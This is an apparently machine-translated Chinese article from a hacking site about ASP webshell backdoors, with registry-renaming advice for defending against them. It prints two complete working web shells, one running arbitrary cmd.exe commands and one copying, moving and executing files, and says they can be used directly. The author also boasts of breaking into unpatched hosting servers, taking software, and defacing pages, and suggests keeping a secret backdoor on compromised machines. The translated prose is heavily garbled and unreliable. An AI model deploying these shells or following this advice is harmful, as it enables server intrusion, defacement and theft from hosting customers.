ASP Trojan code analysis lecture-vulnerability and early warning-the black bar safety net

ID MYHACK58:62200613396
Type myhack58
Reporter 佚名
Modified 2006-12-21T00:00:00


With ASP technology development, the network based on ASP technology to develop the website more and more, the ASP technical support can be said to have is the windows System IIS server one of the basic functions. But based on the ASP technology the backdoor Trojan, also more and more, and functions are more powerful. Since ASP itself is a server to provide a tribute service functions, so this ASP script is Trojan horse Backdoor will be antivirus software killing. Are hackers known as“never be killing the back door.” Due to its high degree of concealment and difficult to kill, on the website of the safety caused a serious threat. Thus for the ASP Trojan prevention and removal, as our network management staff has put forward higher technical requirements. Below I combine personal experience, talk about the two more typical of the ASP Trojan prevention method, I hope to be able to help. The following is the first paragraph of the Trojan code:

<title>ASP Shell</title> <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next -- create the COM objects that we will be using -- Set oScript = Server. CreateObject("WSCRIPT. SHELL") Set oScriptNet = Server. CreateObject("WSCRIPT. NETWORK") Set oFileSys = Server. CreateObject("Scripting. FileSystemObject") -- check for a command that we have posted -- szCMD = Request. Form(". CMD") If (szCMD <> "") Then -- Use a poor mans pipe ... a temp file -- szTempFile = "C:" &oFileSys. GetTempName( ) Call oScript. Run ("cmd.exe /c" &szCMD & " > " &szTempFile, 0, True) Set oFile = oFileSys. OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <FORM action="<%= Request. ServerVariables("URL") %>" method="POST"> <input type=text name=". CMD" size=4 of 5 value="<%= szCMD %>"> <input type=submit value="execute command" > the </FORM> <PRE><% If (IsObject(oFile)) Then -- Read the output from our command and remove the temp file -- On Error Resume Next Response. Write The Server. HTMLEncode(oFile. ReadAll) oFile. Close Call oFileSys. DeleteFile(szTempFile, True) End If %> </BODY> </HTML>

In the command line enter the DIR command point to perform will be able to view the catalog!! It can use various DOS commands such as: copy, net, netstat, etc.

But it's the default execution permissions only to GUEST, that is, the IUSR_COMPUTER user Execute permission. Of course if you put the IUSR_COMPUTER User added to the Administrators group, then you have administrator privileges. This is a Trojan of features, very easy to use. Almost want to when in a DOS command window xx for the same. However, if the server limits the FSO without components upload, then it is no way to use. There is on the server after increasing the virtual host where there is no way to use. Only in the“default Web site”use, so it is opposite the applicable range is narrow.

For prevention methods let us look at its code you know:

Set oScript = Server. CreateObject("WSCRIPT. SHELL") "to establish a named oScript the WSCRIPT. The SHELL object for the execution of the command" Set oScriptNet = Server. CreateObject("WSCRIPT. NETWORK") Set oFileSys = Server. CreateObject("Scripting. FileSystemObject")

The above three lines of code create the WSCRIPT. SHELL, WSCRIPT. NETWORK, Scripting. FileSystemObject three objects, as long as we in the registry to control the WSCRIPT. The SHELL object of the item was renamed or deleted. As shown below: it is worth noting: we should put“WSCRIPT. SHELL”and“WSCRIPT. SHELL. 1”these two items are to be renamed or deleted. Because, as we only modify“WSCRIPT. SHELL”item. Then the hackers as long as the code is modified as follows: Set oScript = Server. CreateObject("WSCRIPT. SHELL. 1") This Backdoor Trojan will be executed.

You may have thought, we in the“WSCRIPT. SHELL”and“WSCRIPT. SHELL. 1”renamed, be sure to not easy to be the hackers to guess, because, for example: you put“WSCRIPT. SHELL”changed“WSCRIPT. SHELL888”in. Hackers just put the code corresponding to the changed: Set oScript = Server. CreateObject("WSCRIPT. SHELL888"), the Trojan program will be executed. Are you modify the registry after re-starting the WEB service, the settings will be effective.

Next let's look at an ASP Backdoor Trojan program code:

<%response. write "<font size=6 color=red > the time can only perform a xx as of < /font > the" %> <%response. write now()%><BR>The program where the physical path: <%response. the write request. servervariables("APPL_PHYSICAL_PATH")%> <html> <title>asps shell. application backdoor </title> <body> <form action="<%= Request. ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%=szCMD %>"> Enter to browse the directory of < br > The <input type=text name=text1 value="<%=szCMD1 %>"> copy <input type=text name=text2 value="<%=szCMD2 %>"><br> <input type=text name=text3 value="<%=szCMD3 %>"> the move <input type=text name=text4 value="<%=szCMD4 %>"><br> Path:<input type=text name=text5 value="<%=szCMD5 %>"> Programs:<input type=text name=text6 value="<%=szCMD6 %>"><br> <input type=submit name=sb value=send the command to > </form> </body> </html> <% szCMD = Request. Form("text") directory browsing if (szCMD <> "") then set shell=server. createobject("shell. application") create the shell object set fod1=shell. namespace(szcmd) set foditems=fod1. items for each co in foditems response. write "<font color=red > the" & amp; co. path &"-----" & amp; co. the size & "</font><br>" next end if %> <% szCMD1 = Request. Form("text1") of the directory copy, not file copy szCMD2 = Request. Form("text2") if szcmd1<>"" and szcmd2<>"" then set shell1=server. createobject("shell. application") create the shell object set fod1=shell1. namespace(szcmd2) for i=len(szcmd1) to 1 step -1 if mid(szcmd1,i,1)="" then path=left(szcmd1,i-1) exit for end if nextif len(path)=2 then path=path & "" path2=right(szcmd1,len(szcmd1)-i) set fod2=shell1. namespace(path) set foditem=fod2. parsename(path2) fod1. copyhere foditem response. write "command completed success!" end if %> <% szCMD3 = Request. Form("text3") directory mobile szCMD4 = Request. Form("text4") if szcmd3<>"" and szcmd4<>"" then set shell2=server. createobject("shell. application") create the shell object set fod1=shell2. namespace(szcmd4) for i=len(szcmd3) to 1 step -1 if mid(szcmd3,i,1)="" then path=left(szcmd3,i-1) exit for end if next if len(path)=2 then path=path & "" path2=right(szcmd3,len(szcmd3)-i) set fod2=shell2. namespace(path) set foditem=fod2. parsename(path2) fod1. movehere foditem response. write "command completed success!" end if %> <% szCMD5 = Request. Form("text5") the execution of the program to the specified path szCMD6 = Request. Form("text6") if szcmd5<>"" and szcmd6<>"" then set shell3=server. createobject("shell. application") create the shell object shell3. namespace(szcmd5). items. item(szcmd6). invokeverb response. write "command completed success!" end if %>

To view the catalog, simply enter the appropriate directory, and point commands. This Trojan thread may complete the file COPY, MOVE, and execute the program. But many commands are not available, for example: del, net, netstat, etc. This Trojan thread function and then simple, but use it to black a web site is sufficient. For example, we can put the site home page MOVE to other places, and then we'll COPY a same name of the hack pages into it, on the line.

The most awsome is this Trojan is applicable to any virtual host, which means I as long as the server is in a virtual space of the user, I can spread this Trojan up, and use it to modify any other user's home page. So if what provides a virtual space of the service provider is not patched, then it's dead.

However, in my practice, found China a lot of virtual space to service providers, especially small service providers are not patched. I take advantage of this vulnerability got a lot of virtual space server ADMIN, and then kindly help them fill holes. Of course I also got I want to get something--a lot of good software and code. I now use a lot of ASP program is from them that the above steals down, too bad, should say DOWN down.

Anyway, we should be how to prevent this ASP Backdoor Trojan program? Let's look at it this way code: set shell=server. createobject("shell. application"), with just the same method,we just put"shell. application"and"shell. application. 1"item is renamed or deleted. Remember, if it is renamed, to change got a little more complicated, don't let the hackers just guessed. By the way, if you give broiler patching is best renamed, and put the name down, so that it become yourself a secret back door. Finally, for both the ASP Backdoor Trojan, and how to prevent ASP Trojan horse back door to do some summing up: first the Trojan functions on the powerful, but the scope is narrow, the need FSO support is"Scripting. FileSystemObject"support. The second paragraph of Trojans although the function on a little less, but it created is"the shell. application"object. In any virtual host are applicable. This little harm indeed too large, to provide support ASP space administrator, you may have to pay attention to.

In fact, according to the above two ASP Trojan horse Backdoor Guard, you may have thought of, for the ASP Backdoor Trojan Guard, as long as we in the registry, the"shell. application"and"WSCRIPT. SHELL"and other dangerous script objects because they are used to create the script command channel is renamed or deleted, that is, to limit the system to the“script SHELL”is created, the ASP Trojan will become without trees, no rice, run not up.

Note: the above code is saved as an ASP file can be used directly.